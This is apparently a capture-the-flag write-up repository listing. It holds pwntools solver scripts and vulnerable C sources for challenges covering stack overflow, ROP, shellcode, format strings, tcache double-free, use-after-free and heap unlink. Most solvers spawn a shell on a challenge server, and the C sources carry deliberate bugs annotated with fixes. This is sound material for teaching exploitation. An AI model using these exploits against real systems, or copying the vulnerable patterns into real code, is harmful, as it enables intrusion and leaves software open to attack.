8 | r = remote(ip, port)
9 | # r = process("./oob5")
10 |
11 | user = 0x601040  # base the index is computed from; presumably a global array in the binary — confirm
12 | win = 0x4007B6
13 |
14 | r.recvuntil("=")
15 | stack = int(r.recvline()[:-1], 16)  # leaked stack address printed after "="
16 | log.info(hex(stack))
17 |
18 | offset = (stack - 0x18 - user) // 8  # distance in 8-byte slots between `user` and stack-0x18; an unchecked index lets it reach the stack
19 | r.sendlineafter(":", str(offset))
20 |
21 | r.sendlineafter(":", p64(win))
22 |
23 | r.interactive()
24 |
--------------------------------------------------------------------------------
/oob5-sean_Pwn-5/oob5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob5-sean_Pwn-5/oob5
--------------------------------------------------------------------------------
/pass/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for pass (see pass.c below): read(0, key, 40) into char key[16] lets the input reach `token`
2 |
3 | ip = "140.110.112.77"
4 | port = 6125
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./pass")
10 |
11 | r.sendlineafter("?", flat("a" * 28, 0xdeadbeef))  # 28 filler bytes, then the value pass.c compares `token` against
12 |
13 | r.interactive()
14 |
--------------------------------------------------------------------------------
/pass/pass:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/pass/pass
--------------------------------------------------------------------------------
/pass/pass.c:
--------------------------------------------------------------------------------
1 | #include"stdio.h"
2 | #include"stdlib.h"
3 |
4 | void printTheKey(){
5 | /*
6 | *
7 | * print the key
8 | *
9 | */
10 | }
11 |
12 | int main(){
13 | setvbuf(stdout, 0, 2, 0);  // 2 == _IONBF: unbuffered stdio so prompts reach the client immediately
14 | setvbuf(stdin, 0, 2, 0);
15 | int token = 1234;
16 | char key[16];  // 16-byte buffer; `token` lives next to it on the stack
17 |
18 | printf("Billy left his key in the locked room.\n");
19 | printf("However, he forgot the token of the room.\n");
20 | printf("Do you know what's the key?");
21 |
22 | read(0, key, 40);  // BUG: reads up to 40 bytes into a 16-byte buffer (stack overflow). Fix: read(0, key, sizeof key - 1) or fgets(key, sizeof key, stdin)
23 |
24 | if((int)token == 0xdeadbeef){  // `token` is never assigned after init; it can only become 0xdeadbeef through the overflow above
25 | printf("Door open. OwO\n");
26 | printTheKey();
27 | system("cat /home/ctf/flag");
28 | }else{
29 | printf("Cannot open door. QwQ\n");
30 | }
31 |
32 | return 0;
33 | }
34 |
--------------------------------------------------------------------------------
/printable/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for printable: format-string leak and write helpers (target binary is not in this listing)
2 | import time
3 |
4 | ip = "140.110.112.77"
5 | port = 4005
6 |
7 | r = remote(ip, port)
8 | # r = process("./printable")
9 |
10 | context.arch = "amd64"
11 |
12 | def Send(data):
13 |     r.sendline(data.ljust(0x30 - 1, 'a'))  # every message is padded to 0x2f chars; presumably the service's fixed input size — confirm
14 |     time.sleep(0.1)  # crude pacing so the next recv does not race the service
15 |
16 | Send("%10$p.%12$p.")  # leak two stack slots as pointers; defensive fix in the service is printf("%s", buf)
17 | out = r.recvline()[:-1].split(b'.')
18 | libc = int(out[0], 16) - 0x21b97  # slot 10 minus a libc-specific offset; only valid for the challenge's libc build
19 | log.info(hex(libc))
20 | ret = int(out[1], 16) - 240 + 0x10  # slot 12 minus a stack-layout-specific offset
21 | log.info(hex(ret))
22 |
23 | one = libc + 0x4f322  # libc-specific offset (author's choice; not verifiable from this listing)
24 |
25 | # 12 -> 38
26 |
27 | def Write1(off, data):
28 |     # Write one byte via %hhn into the pointer held in argument slot `off`.
29 |     if data == 0:
30 |         data = 256  # a 256-char count wraps to 0x00 under %hhn; %0c would not produce a zero count
31 |     Send("%{}c%{}$hhn".format(int(data), off))
32 |
33 | def Next(n):
34 |     # Set the low byte of the pointer in slot 12 to (addr & 0xff) + n; `addr` is a module global assigned below
35 |     Send("%{}c%12$hhn".format((addr & 0xff) + n))
36 |
37 | def Set(data):
38 |     # Write the 8 bytes of `data`, little-endian, starting at `addr`, one byte per round trip
39 |     for i in range(8):
40 |         Next(i)
41 |         Write1(38, data & 0xff)
42 |         data >>= 8
43 |     Next(0)
44 |
45 | Send("%{}c%12$hn".format((ret & 0xffff)))  # two-byte write: point slot 12 at `ret`
46 | addr = ret
47 | Set(one)
48 | Send("%{}c%12$hn".format((ret + 0x40 & 0xffff)))  # note precedence: (ret + 0x40) & 0xffff
49 | addr = ret + 0x48
50 | Set(0)
51 |
52 | time.sleep(0.1)
53 | r.sendline("exit")
54 |
55 | r.interactive()
56 |
--------------------------------------------------------------------------------
/printable/printable:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/printable/printable
--------------------------------------------------------------------------------
/registration/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for registration (see registration.c below): gets() into name[16]/email[32]; the printed id is echoed back to keep the `id != id_backup` check passing
2 |
3 | ip = "140.110.112.77"
4 | port = 6128
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | r = process("./registration")  # NOTE(review): this rebinds `r`, so the remote() connection on line 8 is never used or closed — keep only one of the two
10 |
11 | ret = 0x400619  # single `ret` for stack alignment before `win`; addresses are specific to this build
12 | win = 0x4007d6
13 |
14 | r.recvuntil(":")
15 | ID = int(r.recvline()[:-1])  # the id the service printed; rewritten in place so the integrity check in registration.c still passes
16 | log.info(ID)
17 |
18 | r.sendlineafter(":", "haha")
19 |
20 | payload = b""
21 | payload += flat(b"a" * 60, ID)
22 | payload = payload.ljust(72) + flat(ret, win)
23 |
24 | r.sendlineafter(":", payload)
25 |
26 | r.interactive()
27 |
--------------------------------------------------------------------------------
/registration/registration:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/registration/registration
--------------------------------------------------------------------------------
/registration/registration.c:
--------------------------------------------------------------------------------
1 | #include"stdio.h"
2 | #include"time.h"
3 | #include"stdlib.h"
4 |
5 | int id_backup;  // global copy of `id`, used as a hand-rolled stack-integrity check
6 |
7 | void systemAdmin(){  // never called from main; reachable only through control-flow hijack
8 | system("/bin/sh");
9 | }
10 |
11 | int main(){
12 | setvbuf(stdout, 0, 2, 0);
13 | setvbuf(stdin, 0, 2, 0);
14 |
15 | srand(time(NULL));
16 | int id = rand()%100;  // 0..99, and it is printed below, so the "secret" guard value is public
17 | id_backup = id;
18 | char name[16];
19 | char email[32];
20 |
21 | printf("Weclome to registration.\n");
22 | printf("Here is your id :%d\n", id);
23 | printf("Please filled in information below to complete registration.\n");
24 |
25 | printf("Name:");
26 | gets(name);  // BUG: gets() has no bound; fix: fgets(name, sizeof name, stdin)
27 |
28 | printf("email:");
29 | gets(email);  // BUG: same; fix: fgets(email, sizeof email, stdin)
30 |
31 | if(id != id_backup){  // a canary-style check, but `id` was printed on line 22, so it can be reproduced; use the compiler's stack protector instead
32 | printf("Oops! some error occured.\n");
33 | exit(0);
34 | }
35 |
36 | return 0;
37 | }
38 |
--------------------------------------------------------------------------------
/ret2src/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for ret2src (see ret2src.c below): gets() into text[16]; the chain calls gets() a second time into .bss and returns there
2 |
3 | ip = "140.110.112.77"
4 | port = 6130
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./ret2src")
10 |
11 | pop_rdi = 0x400713
12 | gets = 0x400510  # PLT entry of gets in this build (shadows the name only inside this script)
13 | bss = 0x602000 - 0x100
14 |
15 | payload = b""
16 | payload += b"a" * 24
17 | payload += flat(pop_rdi, bss, gets, bss)  # gets(bss); then return into bss. NOTE(review): this presumes a writable+executable data segment (no NX) — confirm with checksec
18 |
19 | r.sendlineafter(":", payload)
20 |
21 | import time  # style: mid-file import; belongs at the top with the other imports
22 | time.sleep(0.5)
23 |
24 | r.sendline("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")  # raw machine code bytes consumed by the second gets()
25 |
26 | r.interactive()
27 |
--------------------------------------------------------------------------------
/ret2src/ret2src:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/ret2src/ret2src
--------------------------------------------------------------------------------
/ret2src/ret2src.c:
--------------------------------------------------------------------------------
1 | #include"stdio.h"
2 | #include"stdlib.h"
3 |
4 | int main(){
5 | setvbuf(stdout, 0, 2, 0);
6 | setvbuf(stdin, 0, 2, 0);
7 |
8 | char text[16];
9 |
10 | printf("Give me your text :");
11 | gets(text);  // BUG: unbounded read into a 16-byte stack buffer; fix: fgets(text, sizeof text, stdin)
12 |
13 | return 0;
14 | }
15 |
--------------------------------------------------------------------------------
/rop0-sean_Pwn-1/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for rop0: a gadget chain that issues execve ("/bin/sh" is sent first and read into `data`); the target binary is not in this listing
2 | import time
3 |
4 | context.arch = "amd64"
5 |
6 | ip = "140.110.112.77"
7 | port = 3121
8 |
9 | r = remote(ip, port)
10 | # r = process("./rop0")
11 |
12 | data = 0x6ccd60  # address the first line is presumably stored at — confirm against the binary
13 | pop_rsi = 0x401637
14 | pop_rax_rdx_rbx = 0x478616
15 | pop_rdi = 0x401516
16 | syscall = 0x4672b5
17 |
18 | r.sendline('/bin/sh\x00')
19 | time.sleep(0.1)
20 | r.sendline(b'a' * 40 + flat(pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data, pop_rsi, 0, syscall))  # rax=0x3b (execve), rdx=0, rdi=data, rsi=0
21 |
22 | r.interactive()
23 |
--------------------------------------------------------------------------------
/rop0-sean_Pwn-1/rop0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop0-sean_Pwn-1/rop0
--------------------------------------------------------------------------------
/rop1-sean_Pwn-2/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for rop1: the chain is placed in `data` first, then a `leave` gadget pivots the stack to it (target binary is not in this listing)
2 | import time
3 |
4 | context.arch = "amd64"
5 |
6 | ip = "140.110.112.77"
7 | port = 3122
8 |
9 | r = remote(ip, port)
10 | # r = process("./rop1")
11 |
12 | data = 0x6ccd60
13 | pop_rsi = 0x401637
14 | pop_rax_rdx_rbx = 0x478616
15 | pop_rdi = 0x401516
16 | syscall = 0x4672b5
17 | leave = 0x4009e4
18 |
19 | r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))  # slot 0 is the fake saved rbp; '/bin/sh' sits at slot 10, hence data + 10*8
20 |
21 | r.sendlineafter("=", b'a' * 32 + flat(data, leave))  # overwrite saved rbp with `data`, return into `leave` to pivot
22 |
23 | r.interactive()
24 |
--------------------------------------------------------------------------------
/rop1-sean_Pwn-2/rop1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop1-sean_Pwn-2/rop1
--------------------------------------------------------------------------------
/rop2-sean_Pwn-3/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for rop2: same pivot as rop1, but the last byte is a one-byte guess, so the script reconnects until it lands (target binary is not in this listing)
2 | import time
3 |
4 | context.arch = "amd64"
5 |
6 | ip = "140.110.112.77"
7 | port = 3123
8 |
9 | data = 0x6CCD60
10 | pop_rsi = 0x401637
11 | pop_rax_rdx_rbx = 0x478616
12 | pop_rdi = 0x401516
13 | syscall = 0x4672b5
14 | pop_rbp = 0x4004d1  # unused in this script
15 | leave = 0x4009e4
16 |
17 | while True:  # retry loop: each iteration opens a fresh connection
18 |     r = remote(ip, port)
19 |     # r = process("./rop2")
20 |
21 |     r.send(flat(leave, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))
22 |
23 |     guess = 112
24 |     r.sendafter("=", flat(data, leave, 0, 0) + p8(guess))  # partial (single-byte) overwrite; `guess` is the author's fixed value
25 |     try:
26 |         while True:
27 |             try:
28 |                 time.sleep(0.1)
29 |                 r.sendline("cat /home/`whoami`/flag*")
30 |                 flag = r.recv()
31 |                 if b'{' in flag:
32 |                     r.interactive()
33 |             except:  # NOTE(review): bare except also swallows KeyboardInterrupt; prefer `except EOFError:`
34 |                 r.close()
35 |                 break  # leaves only the inner loop; the outer `while True` reconnects
36 |     except:  # NOTE(review): same — bare except
37 |         r.close()
38 | r.interactive()  # NOTE(review): indentation was lost in this listing; at top level this line is unreachable because the outer loop never exits
39 |
--------------------------------------------------------------------------------
/rop2-sean_Pwn-3/rop2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/rop2-sean_Pwn-3/rop2
--------------------------------------------------------------------------------
/secret/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for secret (see secret.c below): scanf("%s", key) into key[16] overruns into `token`
2 |
3 | ip = "140.110.112.77"
4 | port = 6131
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./secret")
10 |
11 | r.sendlineafter(":", flat("a" * 24, 0xab3700000000))  # 0xab37 lands in the upper 4 bytes of the 8-byte word, i.e. on `token`, matching secret.c line 25
12 | r.sendlineafter("?", "Y")  # leave the while(1) loop in secret.c
13 |
14 | r.interactive()
15 |
--------------------------------------------------------------------------------
/secret/secret:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/secret/secret
--------------------------------------------------------------------------------
/secret/secret.c:
--------------------------------------------------------------------------------
1 | #include"stdio.h"
2 | #include"stdlib.h"
3 |
4 | int main(){
5 | setvbuf(stdout, 0, 2, 0);
6 | setvbuf(stdin, 0, 2, 0);
7 | int token = 0xabcd;
8 | char key[16];
9 | char check;
10 |
11 | while(1){
12 | printf("Please input your key :");
13 | scanf("%s", key);  // BUG: unbounded %s into a 16-byte buffer; fix: scanf("%15s", key)
14 |
15 | printf("Your key is ");
16 | printf(key);  // BUG: user input used as the format string; fix: printf("%s", key)
17 | printf("\n");
18 |
19 | printf("Are you sure ? (Y/N)");
20 | getchar();  // consume the newline left by scanf
21 | scanf("%c", &check);
22 | if(check == 'Y')break;
23 | }
24 |
25 | if((int)token == 0xab37){  // `token` is only ever 0xabcd unless the overflow above changes it
26 | printf("Door open. OwO\n");
27 | system("cat /home/ctf/flag");
28 | }else{
29 | printf("Cannot open door. QwQ\n");
30 | }
31 |
32 | return 0;
33 | }
34 |
--------------------------------------------------------------------------------
/snowman/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # snowman.c prints the flag on both branches, so any one-character answer works
2 |
3 | context.arch = "amd64"
4 |
5 | r = process("./snowman")
6 |
7 | r.sendline("y")
8 |
9 | r.interactive()
10 |
--------------------------------------------------------------------------------
/snowman/snowman:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/snowman/snowman
--------------------------------------------------------------------------------
/snowman/snowman.c:
--------------------------------------------------------------------------------
1 | #include  // header name lost in this listing (angle-bracket include stripped on extraction)
2 | #include  // same
3 |
4 | void
5 | snowman ()
6 | {
7 | printf ("flag{0laf}\n");
8 | }
9 |
10 | int
11 | main ()
12 | {
13 | char ans[2];
14 | printf ("Do you want to build a snowman?");
15 | scanf ("%1s", ans);  // width 1 plus the terminator fits ans[2]
16 | if (ans[0] == 'y')
17 | {
18 | snowman ();
19 | }
20 | else
21 | {
22 | ans[0] = 'y';  // both branches end up calling snowman(); the comparison is decorative
23 | snowman ();
24 | }
25 | return 0;
26 | }
27 |
--------------------------------------------------------------------------------
/snowman/snowman.py:
--------------------------------------------------------------------------------
1 | '''
2 | Just a guide for angr.
3 | You can solve the challenge (asciiart) with these skills.
4 | '''
5 | import angr
6 | proj = angr.Project('snowman')
7 | snowman_adr = proj.loader.find_symbol('snowman').rebased_addr
8 | print(f'snowman in: {hex(snowman_adr)}')
9 | simgr = proj.factory.simgr()
10 | simgr.explore(find=0x400662)  # explore until this address is reached (presumably inside the 'y' branch of main — confirm in a disassembler)
11 | #simgr.explore(find=0x40066e)
12 | snowman_y = simgr.found[0]
13 | ans = snowman_y.mem[snowman_y.regs.rbp-0xa].uint8_t.resolved  # read ans[0] from the found state's stack frame
14 | ans_0 = snowman_y.solver.eval(ans)  # concretize the symbolic byte
15 | print(f'ans[0] = {chr(ans_0)} ({ans_0})')
16 | print('stdout:', snowman_y.posix.dumps(1))
17 | print('stdin:', snowman_y.posix.dumps(0))
18 | print(simgr)
19 | simgr.move(from_stash='active', to_stash='garbage')  # drop the other paths, keep only the found state active
20 | print(simgr)
21 | simgr.move(from_stash='found', to_stash='active')
22 | print(simgr)
23 | simgr.explore(find=0x400617)  # continue from the found state to a second target address
24 | print(simgr.found[0].posix.dumps(1))
25 |
--------------------------------------------------------------------------------
/tcache/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for tcache: menu helpers over a 3-option service (target binary is not in this listing)
2 | import time
3 |
4 | ip = "140.110.112.77"
5 | port = 4007
6 |
7 | # r = process("./tcache")
8 | r = remote(ip, port)
9 |
10 | def Say(data):
11 |     # option 1: allocate/write; data is zero-padded to 0x18 bytes
12 |     r.sendlineafter(">", "1")
13 |     time.sleep(0.1)
14 |     r.send(data.ljust(0x18, b'\x00'))
15 |
16 | def Print():
17 |     # option 2: print the current buffer
18 |     r.sendlineafter(">", "2")
19 |
20 | def Burn():
21 |     # option 3: free the current buffer
22 |     r.sendlineafter(">", "3")
23 |
24 | context.arch = "amd64"
25 |
26 | atoi_got = 0x403fe8
27 | ptr = 0x404050
28 |
29 | def Write(addr, data):
30 |     # Arbitrary write primitive: Burn() four times on one allocation presumes the service frees the same chunk repeatedly
31 |     # (double free). Defensive fix in the service: null the pointer after free(); newer glibc also aborts on tcache double free.
32 |     Say(b'')
33 |     Burn()
34 |     Burn()
35 |     Burn()
36 |     Burn()
37 |     Say(p64(addr))
38 |     Say(b'')
39 |     Say(data)
40 |
41 | Write(ptr, flat(atoi_got))  # make the service's buffer pointer refer to the atoi GOT slot, then Print() leaks it
42 | Print()
43 | r.recvline()
44 | libc = u64(r.recv()[:6].ljust(8, b'\x00')) - 0x40680  # 6 significant bytes of a 64-bit pointer; offset is specific to the challenge libc
45 | log.info(hex(libc))
46 | r.sendline("")
47 |
48 | one = libc + 0x4f322
49 | free_hook = libc + 0x3ed8e8  # libc-specific; hooks like this are removed in recent glibc, so the write target would not exist there
50 | Write(free_hook, p64(one))
51 | Burn()
52 |
53 | r.interactive()
54 |
--------------------------------------------------------------------------------
/tcache/tcache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/tcache/tcache
--------------------------------------------------------------------------------
/uaf/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for uaf: option 4 is used before and after a fresh allocation of the same size, so presumably a freed object is reused (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 4006
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./uaf")
10 |
11 | win = 0x401239
12 |
13 | r.sendlineafter(">", "4")
14 |
15 | r.sendlineafter(">", "1")
16 | r.sendlineafter(":", "160")  # 160 == 8 * 20: the payload below is 19 filler words plus `win`
17 |
18 | payload = b"a" * 8 * 19
19 | payload += flat(win)
20 |
21 | r.sendlineafter(":", payload)
22 |
23 | r.sendlineafter(">", "4")  # defensive fix in the service: null the pointer after free and check it before use
24 |
25 | r.interactive()
26 |
--------------------------------------------------------------------------------
/uaf/uaf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/uaf/uaf
--------------------------------------------------------------------------------
/unlink/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for unlink (see unlink.c below): the write option reads 0xa0 bytes into a 0x80 chunk, so chunk 0 overflows into chunk 1's header
2 |
3 | ip = "140.110.112.77"
4 | port = 9002
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./unlink")
10 |
11 | def Free(idx):
12 |     # menu (0): free(ary[idx])
13 |     r.sendlineafter(":", "0")
14 |     r.sendlineafter("x = ", str(idx))
15 |
16 | def Malloc(idx):
17 |     # menu (1): ary[idx] = malloc(0x80); returns the printed chunk address
18 |     r.sendlineafter(":", "1")
19 |     r.sendlineafter("x = ", str(idx))
20 |     r.recvuntil(":")
21 |     return int(r.recvline()[:-1], 16)
22 |
23 | def Write(idx, data):
24 |     # menu (2): read(0, ary[idx], 0xa0)
25 |     r.sendlineafter(":", "2")
26 |     r.sendlineafter("x = ", str(idx))
27 |     r.sendlineafter("=", data)
28 |
29 | def Show(idx):
30 |     # menu (3): print ary[idx] as a string; unused below
31 |     r.sendlineafter(":", "3")
32 |     r.sendlineafter("x = ", str(idx))
33 |     r.recvuntil(":\n")
34 |     return r.recvline()[:-1]
35 |
36 | r.recvuntil(":")  # unlink.c prints &victim, &size and &ary[0] at startup
37 | victim = int(r.recvline()[:-1], 16)
38 | r.recvuntil(":")
39 | sz = int(r.recvline()[:-1], 16)
40 | r.recvuntil(":")
41 | ary = int(r.recvline()[:-1], 16)
42 | log.info(hex(ary))
43 |
44 | Malloc(0)
45 | Malloc(1)
46 |
47 | payload = b""
48 | payload += flat(0, 0, ary - 0x18, ary - 0x10)  # fake fd/bk that point back at ary[0] (classic unlink check: fd->bk == bk->fd == chunk)
49 | payload = payload.ljust(0x80)
50 | payload += flat(0x80, 0x90)  # chunk 1's prev_size/size, rewritten with prev_inuse clear
51 |
52 | Write(0, payload)
53 |
54 | Free(1)  # consolidation with chunk 0 triggers unlink, leaving ary[0] pointing into ary itself
55 |
56 | Write(0, flat([0xdeadbeef] * 3))
57 |
58 | r.sendlineafter(":", "87")  # out of range for input() in unlink.c, so it returns EOF and main leaves the menu loop to the `victim` check
59 |
60 | r.interactive()
61 |
--------------------------------------------------------------------------------
/unlink/unlink:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/unlink/unlink
--------------------------------------------------------------------------------
/unlink/unlink.c:
--------------------------------------------------------------------------------
1 | #include  // header names lost in this listing (angle-bracket includes stripped on extraction)
2 | #include
3 | #include
4 | #define MALLOC_SIZE 0x80
5 |
6 | int input();
7 |
8 |
9 | int main(int argc, char *argv[])
10 | {
11 | int select;
12 | unsigned long long size = 0x20;
13 | unsigned long long victim = 0x1337;
14 | char *ary[4];  // never initialized: free/show on a slot that was not malloc'd uses an indeterminate pointer
15 | setvbuf(stdout, NULL, _IONBF, 0);
16 | printf("victim's address:%p\n", &victim);  // intentional stack-address disclosure for the challenge
17 | printf("size's address:%p\n", &size);
18 | printf("ary's adr:%p\n", &ary[0]);
19 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: ");
20 | while((select = input()) != EOF)
21 | {
22 | if(select == 1) // x = malloc
23 | {
24 | printf("ary[x] = malloc(%d) // (0 <= x <= 3)\nx = ", MALLOC_SIZE);
25 | if((select = input()) != EOF) ary[select] = (char *) malloc(MALLOC_SIZE);
26 | else printf("invalid number\n");
27 | printf("adr:%p\n", ary[select]);  // BUG: when input() returned EOF (-1) this reads ary[-1]; move the print inside the if
28 | }
29 | else if(select == 0) // free(x)
30 | {
31 | printf("free(ary[x]) // (0 <= x <= 3)\nx = ");
32 | if((select = input()) != EOF)
33 | {
34 | free(ary[select]);  // BUG: pointer is not cleared, so a second free or a later write/show uses freed memory; fix: ary[select] = NULL after free
35 | }
36 | else printf("invalid number\n");
37 | }
38 | else if(select == 2) // x = string
39 | {
40 | printf("*ary[x] = string // (0 <= x <= 3)\nx = ");
41 | while((select = input()) == EOF)
42 | {
43 | printf("invalid number\n");
44 | printf("*ary[x] = string // (0 <= x <= 3)\nx = ");
45 | }
46 | printf("string = ");
47 | read(0, ary[select], 0xa0);  // BUG: 0xa0 bytes into a MALLOC_SIZE (0x80) chunk — heap overflow; fix: read(0, ary[select], MALLOC_SIZE)
48 | }
49 | else if(select == 3) // show x
50 | {
51 | printf("print *ary[x] // (0 <= x <= 3)\nx = ");
52 | if((select = input()) != EOF) printf("your string:\n%s\n", ary[select]);
53 | else printf("invalid number\n");
54 | }
55 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: ");
56 | }
57 |
58 | if(victim == 0xdeadbeef)  // `victim` is a local never assigned after init; only memory corruption can change it
59 | {
60 | system("cat flag");
61 | }
62 | printf("Goodbye!\n");
63 | return 0;
64 | }
65 |
66 |
67 | int input()
68 | {
69 | // Read one menu number; echo it; return it if 0..3, otherwise EOF (so any out-of-range number also ends the main loop)
70 | int select;
71 | if(scanf("%d", &select) != EOF)  // NOTE: a non-numeric token makes scanf return 0, not EOF, and leaves `select` uninitialized
72 | {
73 | printf("%d\n", select);
74 | return (select >= 0 && select <= 3) ? select : EOF;
75 | }
76 | else
77 | {
78 | return EOF;
79 | }
80 | }
81 |
--------------------------------------------------------------------------------
/張元_Pwn-1/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for luck (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 2111
5 |
6 | r = remote(ip, port)
7 | # r = process("./luck")
8 |
9 | payload = flat([0, 0, 0, 0xFACEB00C, 0xDEADBEEF, 0])  # NOTE(review): context.arch is never set in this script, so flat() packs with pwntools' default word size — confirm it matches the binary
10 |
11 | r.sendlineafter("me:", payload)
12 | r.sendlineafter(":", "pass")
13 |
14 | r.interactive()
15 |
--------------------------------------------------------------------------------
/張元_Pwn-1/luck:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-1/luck
--------------------------------------------------------------------------------
/張元_Pwn-10/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for plt: "/bin/sh" is stored first, then a pop rdi; system@plt chain (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 2120
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./plt")
10 |
11 | system = 0x400530  # PLT entry in this build (shadows the name only inside this script)
12 | binsh = 0x601070  # where the first answer is presumably stored — confirm against the binary
13 | pop_rdi = 0x400773
14 |
15 | r.sendlineafter("?", "/bin/sh\x00")
16 |
17 | payload = b""
18 | payload += b"a" * 56
19 | payload += flat(pop_rdi, binsh, system)
20 |
21 | r.sendlineafter("?", payload)
22 |
23 | r.interactive()
24 |
--------------------------------------------------------------------------------
/張元_Pwn-10/plt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-10/plt
--------------------------------------------------------------------------------
/張元_Pwn-3/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for rop (static binary, judging by the gadget addresses): read(0, data, 0x10) then execve(data, 0, 0); binary not in this listing
2 |
3 | ip = "140.110.112.77"
4 | port = 2113
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./rop")
10 |
11 | read = 0x43f5c0  # shadows the builtin name only inside this script
12 | data = 0x6cc000 - 0x100
13 | pop_rdx_rsi = 0x442a19
14 | pop_rdi = 0x4014f6
15 | pop_rax = 0x44f6cc
16 | syscall = 0x4003da
17 |
18 | payload = b""
19 | payload += b"\x00".ljust(40)  # bytes.ljust pads with spaces
20 | payload += flat(pop_rdi, 0, pop_rdx_rsi, 0x10, data, read)  # read(0, data, 0x10)
21 | payload += flat(pop_rax, 0x3b, pop_rdi, data, pop_rdx_rsi, 0, 0, syscall)  # execve(data, 0, 0)
22 |
23 | r.sendlineafter(".", payload)
24 |
25 | import time  # style: mid-file import; belongs at the top
26 | time.sleep(0.5)
27 |
28 | r.sendline("/bin/sh\x00")  # consumed by the read() in the chain
29 |
30 | r.interactive()
31 |
--------------------------------------------------------------------------------
/張元_Pwn-3/rop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-3/rop
--------------------------------------------------------------------------------
/張元_Pwn-6/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for pwntools: answer 1000 arithmetic questions of the form "a op b ?"
2 |
3 | ip = "140.110.112.77"
4 | port = 2116
5 |
6 | r = remote(ip, port)
7 | # r = process("./pwntools")
8 |
9 | r.sendlineafter(")", p32(0x79487FF))  # 4 raw bytes expected by the first prompt
10 | r.recvuntil(".\n")
11 |
12 | for _ in range(1000):
13 |     res = r.recvuntil("?").split()
14 |     a, b = int(res[0]), int(res[2])
15 |     op = res[1]
16 |     if op == b"+":
17 |         r.sendline(str(a + b))
18 |     elif op == b"-":
19 |         r.sendline(str(a - b))
20 |     elif op == b"*":
21 |         r.sendline(str(a * b))  # NOTE(review): no else branch — an unexpected operator sends nothing and the next recvuntil blocks
22 |
